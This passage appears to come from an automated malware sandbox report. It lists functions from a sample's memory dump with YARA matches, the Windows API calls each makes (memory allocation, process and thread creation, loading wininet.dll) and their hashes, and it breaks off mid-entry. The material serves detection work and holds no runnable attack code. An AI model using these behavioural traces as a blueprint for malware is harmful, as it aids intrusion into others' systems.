                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction ID: 15d910b941b45661d122721d6c4b1ba2521f90d60fcbde056acd0ad5f9f8c4ad
                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction Fuzzy Hash: 6DF0BDB2200208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E811CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02FE866E, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(02FE3D72,5E972F65,FFFFFFFF,02FE3A31,?,?,02FE3D72,?,02FE3A31,FFFFFFFF,5E972F65,02FE3D72,?,00000000), ref: 02FE86B5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 11d34d3fbc074ae6b6fe2a1b2a544983719427099de6fd87a9802b4ccae1768e
                                            • Instruction ID: 6700aad39f27ec918e8461c031aad012404c0cd98d0e52ff53ed025de4d8a47c
                                            • Opcode Fuzzy Hash: 11d34d3fbc074ae6b6fe2a1b2a544983719427099de6fd87a9802b4ccae1768e
                                            • Instruction Fuzzy Hash: B0F0A4B6200108AFDB18DF99DC84EEB77A9AF8C754F15864CFE1DA7251D630E811CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02FE8670, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(02FE3D72,5E972F65,FFFFFFFF,02FE3A31,?,?,02FE3D72,?,02FE3A31,FFFFFFFF,5E972F65,02FE3D72,?,00000000), ref: 02FE86B5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction ID: bdd2e8f1b897ca54d14adab7309e715349cb01657e14040b2168095f1f5b1389
                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction Fuzzy Hash: C5F0B7B2200208AFDB18DF89DC84EEB77ADEF8C754F158648BE1D97241D630E811CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02FE879A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02FD2D11,00002000,00003000,00000004), ref: 02FE87D9
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: bda133b4caf38dff02bf552687992700eaef281ceffe99759f5b8c8556e85bbb
                                            • Instruction ID: fb8d2011e5d725f9edad2581de75a30e0c728fe8900fa0fdc2d783a9ff1258b4
                                            • Opcode Fuzzy Hash: bda133b4caf38dff02bf552687992700eaef281ceffe99759f5b8c8556e85bbb
                                            • Instruction Fuzzy Hash: B6F0F8B2610218BFDB18DF99CC80EEB77ADEF88350F118559FE09A7241C634E811CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02FE87A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02FD2D11,00002000,00003000,00000004), ref: 02FE87D9
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction ID: 18dcc90dc6f106a9659492cfeb8b0f0d52e8f90f06453d3ac786e4654ce42003
                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                            • Instruction Fuzzy Hash: 31F015B2200208ABDB18DF89CC80EAB77ADAF88750F118548BE0997241C630F810CBB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02FE86F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(02FE3D50,?,?,02FE3D50,00000000,FFFFFFFF), ref: 02FE8715
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction ID: 8b7a3f389ecbce9dcc684feb357ad8c38b97f271b023a8b780082707ad946dbb
                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction Fuzzy Hash: 09D012752002146BDB14EB98CC45E97775DEF44750F154459BA195B241C570F50086E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03509710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9a025f1f08bc40c9440181b61be1ec6d3fecf42e3ec1f637f6a2fa53656bffe1
                                            • Instruction ID: 802f6f143ec029834b67a6e9fe7652a9ee00344c6428cf52a4432a3c2abdfbb0
                                            • Opcode Fuzzy Hash: 9a025f1f08bc40c9440181b61be1ec6d3fecf42e3ec1f637f6a2fa53656bffe1
                                            • Instruction Fuzzy Hash: 4F90027134105802E100A59964086560495A7E0345F51D411A5014556EC7A588E17171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03509FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b70aec1e14546081681772a184eaea0f4f25cb266018b1ecde1851f6c85a47dc
                                            • Instruction ID: 26338d62bc514d1bd904aec87f1b1a4a0aa89b7b120d3e67d9e871266e2d5a2d
                                            • Opcode Fuzzy Hash: b70aec1e14546081681772a184eaea0f4f25cb266018b1ecde1851f6c85a47dc
                                            • Instruction Fuzzy Hash: 9C90027135119802E110A15994047160495A7D1245F51C811A0814559D87D588E17162
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03509780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f747bc667a2574a98ea961c6f67a335b9cd75064eddf82caaae048680db129e2
                                            • Instruction ID: f8c2ad3c7842c4e7ef1925a5e9e79cd7d26c070035ea33b839aa7a5418653381
                                            • Opcode Fuzzy Hash: f747bc667a2574a98ea961c6f67a335b9cd75064eddf82caaae048680db129e2
                                            • Instruction Fuzzy Hash: 5D90026935305402E180B159640861A0495A7D1246F91D815A0005559CCA5588B96361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03509650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 51a2234699c599de230dbda0158dae55fad2b737935be872087524dc88696e5d
                                            • Instruction ID: e9235b0ccbc4fdb54f1819a687170e2b1b24e6b0a05c788c8a98cc314f6e2313
                                            • Opcode Fuzzy Hash: 51a2234699c599de230dbda0158dae55fad2b737935be872087524dc88696e5d
                                            • Instruction Fuzzy Hash: C990027134509C42E140B1595404A5604A5A7D0349F51C411A0054695D97658DA5B6A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03509A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7d3951189a2a4ab387aa51e7f8b364eefabdae4edc172afc62674c3b26c7647a
                                            • Instruction ID: 6db2ba379eaf12fa7850fbc31a2dd2dadc41749cad5a67969c5cedc43795850f
                                            • Opcode Fuzzy Hash: 7d3951189a2a4ab387aa51e7f8b364eefabdae4edc172afc62674c3b26c7647a
                                            • Instruction Fuzzy Hash: 7190026135185442E200A5695C14B170495A7D0347F51C515A0144555CCA5588B16561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03509660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a8072fde1a9e15662c0fceaf5c2d7636dc17237a1fb729dbe94b415e6120f205
                                            • Instruction ID: ce514452d859d8ba9d5385bf736a3c96ebaea6bb15632efda4b5ac1f5bb1ee42
                                            • Opcode Fuzzy Hash: a8072fde1a9e15662c0fceaf5c2d7636dc17237a1fb729dbe94b415e6120f205
                                            • Instruction Fuzzy Hash: D490027134105C02E180B159540465A0495A7D1345F91C415A0015655DCB558AA977E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 035096D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0da4b13d4fb556df4ebe16ef6fc2d00d1c187075ec7b20dac0ef8db097e60735
                                            • Instruction ID: eed56753d6267da5982ee81d4ec34840f87a88779c6f83891b3bb5beb25682b1
                                            • Opcode Fuzzy Hash: 0da4b13d4fb556df4ebe16ef6fc2d00d1c187075ec7b20dac0ef8db097e60735
                                            • Instruction Fuzzy Hash: F290027134105C42E100A1595404B560495A7E0345F51C416A0114655D8755C8A17561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 035096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0087bdbb45682c841e6602db2340c7f657a9d60fb2e727fe2d51d20028751273
                                            • Instruction ID: 69bfaaf40895f8a18709bbfe8bfb53c0a5f6faa5542a5eac3d670797b3fae108
                                            • Opcode Fuzzy Hash: 0087bdbb45682c841e6602db2340c7f657a9d60fb2e727fe2d51d20028751273
                                            • Instruction Fuzzy Hash: BA9002713410DC02E110A159940475A0495A7D0345F55C811A4414659D87D588E17161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03509540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7512da8f7dd0eeca5da54f50d4b0550385ac2f75d2b1e9246a026b0489bc0460
                                            • Instruction ID: 72918eca3343ee1cb496dd76461ea25668672427bf4f65170508de168e8bf52f
                                            • Opcode Fuzzy Hash: 7512da8f7dd0eeca5da54f50d4b0550385ac2f75d2b1e9246a026b0489bc0460
                                            • Instruction Fuzzy Hash: DD900475351054031105F55D170451704D7F7D53D5351C431F1005551CD771CCF17171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03509910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 733119bacb6cdd605636d354828e9dd9936ef5892fcb04d3ce9ed3e5f4edf3b9
                                            • Instruction ID: c2629c1338bc902320ccbbed32767c5db26e3d68548961a1ec8516f3395fe1d8
                                            • Opcode Fuzzy Hash: 733119bacb6cdd605636d354828e9dd9936ef5892fcb04d3ce9ed3e5f4edf3b9
                                            • Instruction Fuzzy Hash: A09002B134105802E140B15954047560495A7D0345F51C411A5054555E87998DE576A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 035095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d12810f08dd03937e0468ada6973e64f56ba250980eb1f8ca43778ea5aff68fb
                                            • Instruction ID: 3ec32d10fe1d2354f1955eacf11d1fa0c79c643b8b711bec01fa16e2c89e3273
                                            • Opcode Fuzzy Hash: d12810f08dd03937e0468ada6973e64f56ba250980eb1f8ca43778ea5aff68fb
                                            • Instruction Fuzzy Hash: 9A9002A1342054035105B1595414626449AA7E0245B51C421E1004591DC66588E17165
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 035099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 04026c4132e69e24675bbda8db567e8c48d78c2d8691ffa22f06515cb8b42c42
                                            • Instruction ID: 1f2e5ffe076a5a20bbf875730ebda21d7a3a4e7872f5e5d34d6d34211c79e0fb
                                            • Opcode Fuzzy Hash: 04026c4132e69e24675bbda8db567e8c48d78c2d8691ffa22f06515cb8b42c42
                                            • Instruction Fuzzy Hash: A99002A138105842E100A1595414B160495E7E1345F51C415E1054555D8759CCA27166
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03509840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: fac78e13f16dc15222128715efb6c2a46df8577744d891ffd1a2a70fbff3eb0d
                                            • Instruction ID: 8cecffe294b58361acf25590d531799798fc1a556d135b3d1436d9b5def7d367
                                            • Opcode Fuzzy Hash: fac78e13f16dc15222128715efb6c2a46df8577744d891ffd1a2a70fbff3eb0d
                                            • Instruction Fuzzy Hash: A5900261382095526545F15954045174496B7E0285791C412A1404951C866698A6E661
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03509860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932883873.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: true
                                            • Associated: 00000008.00000002.933011452.00000000035BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 07d48f74e6d7d42fb52c6282919f88da57c36d1685d82ae9d62e3ea9f8b15873
                                            • Instruction ID: f52e5c50b71bffb27d165fb64a926beee21a86d47f84dcd0781fb1183fd3457b
                                            • Opcode Fuzzy Hash: 07d48f74e6d7d42fb52c6282919f88da57c36d1685d82ae9d62e3ea9f8b15873
                                            • Instruction Fuzzy Hash: 9D90027134105813E111A15955047170499A7D0285F91C812A0414559D979689A2B161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02FE72E0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 02FE7388
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 845d09c5812c3f1fdf0278c6f89c75663bf61d8411baaf0f172a2671cfd6218f
                                            • Instruction ID: 1e93f5b5ab5f644932d6b7855ce2e824c930ceb5e714435cf253049a91b0b898
                                            • Opcode Fuzzy Hash: 845d09c5812c3f1fdf0278c6f89c75663bf61d8411baaf0f172a2671cfd6218f
                                            • Instruction Fuzzy Hash: FA31AFB6641600ABDB16EF64CCA0FABF7B9EF48740F00851DFA1A9B240D730A505CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02FE72D7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 84sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 02FE7388
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 71f9ca019e26b35e0a2cc8770356f5b7a437718b6c381998a2dc65ba4eb80cbc
                                            • Instruction ID: 1d87cafa9e3c1c7b08aa941ea919d5f921111453c0acaeab3eab770ff4ded762
                                            • Opcode Fuzzy Hash: 71f9ca019e26b35e0a2cc8770356f5b7a437718b6c381998a2dc65ba4eb80cbc
                                            • Instruction Fuzzy Hash: A031A072A41204ABCB11EF64CCA0F6BF7A5EF48740F008159FA1A9B281D770A555CBE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02FE88C2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02FD3B93), ref: 02FE88FD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: 54e7fbc80c14ad6a143700dae03c6e30a2826b6db8a7aaec0d90cbc8b035d365
                                            • Instruction ID: f66f41d39a55d8246579c84421014e1015513d8045bfea027a36e3c869e691a8
                                            • Opcode Fuzzy Hash: 54e7fbc80c14ad6a143700dae03c6e30a2826b6db8a7aaec0d90cbc8b035d365
                                            • Instruction Fuzzy Hash: 7AE092B52102146BDB18DF58CC49EDB7769EF88791F218554FD099B342C631E912CBF2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02FE88D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02FD3B93), ref: 02FE88FD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction ID: 1469c58290cb3fecd3282f7235121d50343de1dae278f86383501320ac72a712
                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction Fuzzy Hash: 11E046B1200208ABDB18EF99CC48EA777ADEF88750F118558FE095B241C630F910CAF0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02FD7280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02FD72DA
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02FD72FB
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: f22d3f0c167aa5cbdf7b4392c342a80d126bf9e03f11585d1b9ec44548293c15
                                            • Instruction ID: 10965696d04f5c9a5ed4fca77b8fca3a51196d77e9b84625c9ced550c72c9519
                                            • Opcode Fuzzy Hash: f22d3f0c167aa5cbdf7b4392c342a80d126bf9e03f11585d1b9ec44548293c15
                                            • Instruction Fuzzy Hash: F201DB31E8022977EB21B6959C42FFEB76E5B40F91F150158FF04BA1C0EAD469054BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02FD9B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02FD9BB2
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                            • Instruction ID: cd69023bc71ccb6acd2bccdbb2870ea17ca75250dc57e5303c2dd9513b686dac
                                            • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                            • Instruction Fuzzy Hash: 320121B5E0020DBBDF10DBE4DC42F9EB779AB54348F0441A5EA0997284F671EB18CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02FE8940, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02FE8994
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction ID: 458c4a9df89f3820f1a2aca68be921416a26436dcee634155ea815ec7985b446
                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction Fuzzy Hash: 1601B2B2210108BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02FE7410, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02FDCCF0,?,?), ref: 02FE744C
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Offset: 02FD0000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 8e1393f0d913575f1db8de2dab859c78e410f61a9b540c9433875871d25525b2
                                            • Instruction ID: 7de8b585ff4a29ff104ee056aee489f28bafffe034e8a5e9b631a3376eda306d
                                            • Opcode Fuzzy Hash: 8e1393f0d913575f1db8de2dab859c78e410f61a9b540c9433875871d25525b2
                                            • Instruction Fuzzy Hash: 0EE06D337803043AE62165999C02FA7B79C9B81B64F140466FB0EEB2C0D595F90146A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02FE7405, Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02FDCCF0,?,?), ref: 02FE744C
                                            Memory Dump Source
